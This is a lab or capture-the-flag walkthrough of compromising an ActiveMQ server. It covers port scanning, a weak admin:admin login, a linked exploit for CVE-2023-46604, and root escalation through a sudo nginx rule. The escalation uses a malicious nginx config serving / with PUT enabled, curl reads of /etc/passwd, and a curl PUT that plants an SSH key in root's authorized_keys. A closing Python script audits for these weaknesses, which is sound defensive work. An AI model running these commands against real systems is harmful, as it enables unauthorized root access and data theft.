1 Information

1.1 nmap

┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 10000 10.10.11.243
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 02:32 EST
Warning: 10.10.11.243 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.243
Host is up (0.22s latency).
Not shown: 63029 closed tcp ports (conn-refused), 2497 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
37733/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 104.81 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80,1883,5672,8161,37733,61613,61614,61616 10.10.11.243
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 02:35 EST
Nmap scan report for 10.10.11.243
Host is up (0.22s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
1883/tcp open mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
37733/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
......
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.71 seconds

  • 8161: the ActiveMQ front-end port, serving the web management console
  • 61616: the default ActiveMQ back-end port, serving JMS (Java Message Service) traffic

1.2 WEB

Visit port 80.

Log in with the weak credentials admin:admin.

Following "Manage ActiveMQ broker" redirects to /admin, which shows the following information:

2 WEB Shell

ActiveMQ has a new vulnerability, CVE-2023-46604, an unauthenticated remote code execution flaw.

POC : https://github.com/evkl1d/CVE-2023-46604

Following the PoC's README, a webshell on the broker is easily obtained.

3 Privilege

3.1 sudo privilege escalation

Before escalating, check whether sudo can be used:

activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:/opt/apache-activemq-5.15.15/bin$

With this, a malicious nginx instance can be started whose document root is the filesystem root and which even accepts PUT requests.

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

The nginx configuration file.

After editing the nginx configuration file, upload it to the target machine.

Start the malicious service with sudo nginx:

activemq@broker:~$ sudo /usr/sbin/nginx -c /home/activemq/nginx.conf 
sudo /usr/sbin/nginx -c /home/activemq/nginx.conf

Use curl against the nginx service to read local files:

activemq@broker:~$ curl http://127.0.0.1:1337/etc/passwd          
curl http://127.0.0.1:1337/etc/passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1880 100 1880 0 0 1599k 0 --:--:-- --:--:-- --:--:-- 1835k
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
......

3.2 SSH login

Generate an SSH key pair locally.

Write the public key to the target machine:

activemq@broker:~$ curl -X PUT http://127.0.0.1:1337/root/.ssh/authorized_keys -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCONGEADNHteG1ndR7ctkZSxs7m/PNLsCBxJRozCU0AiAdiuWl/YTIqZMvIg/e9o5ftye0Wu46T91n1I30mzPiR2Lg7AVmxP7ngv2v3Crb3x/fl6sPwhBDKtFCZQnu......."

Connect over SSH.
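As an added defender-side example (not from the writeup or the ActiveMQ project), this Python script flags the two conditions the escalation in 3.1 and 3.2 depends on: a sudoers rule that runs nginx with no fixed argument list (so an arbitrary -c config is accepted), and an nginx configuration whose directives turn the daemon into a read/write file server over /. The sample inputs are constructed copies of the output shown above.

```python
import re

# Constructed sample inputs, copied from the writeup above (not live data).
SUDO_L_OUTPUT = """\
User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
"""

NGINX_CONF = """\
user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
"""

DAV_WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}


def statements(conf: str):
    """Yield (directive, args) pairs; comments stripped, block braces flattened."""
    no_comments = "\n".join(l.split("#", 1)[0] for l in conf.splitlines())
    for stmt in re.split(r"[;{}]", no_comments):
        parts = stmt.split()
        if parts:
            yield parts[0], parts[1:]


def audit_nginx_conf(conf: str) -> list[str]:
    """Return finding codes for directives that expose the filesystem through nginx."""
    findings = []
    for name, args in statements(conf):
        if name == "user" and args[:1] == ["root"]:
            findings.append("user_root")          # workers run as root, no privilege drop
        elif name == "root" and args[:1] == ["/"]:
            findings.append("root_is_fs_root")    # the whole filesystem is the docroot
        elif name == "autoindex" and args[:1] == ["on"]:
            findings.append("autoindex_on")       # directory listings enabled
        elif name == "dav_methods" and DAV_WRITE_METHODS & set(args):
            findings.append("dav_write")          # WebDAV write methods (PUT etc.) on
    return findings


def unrestricted_nginx_sudo(sudo_l: str) -> bool:
    """True if a NOPASSWD rule runs nginx with no fixed arguments (any -c config allowed)."""
    return re.search(r"NOPASSWD:\s*\S*/nginx\s*$", sudo_l, re.M) is not None


if __name__ == "__main__":
    print(audit_nginx_conf(NGINX_CONF))
    print(unrestricted_nginx_sudo(SUDO_L_OUTPUT))
```

A rule that pins the arguments (for example `/usr/sbin/nginx -t`) is not flagged, since it does not let the caller choose the configuration file.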
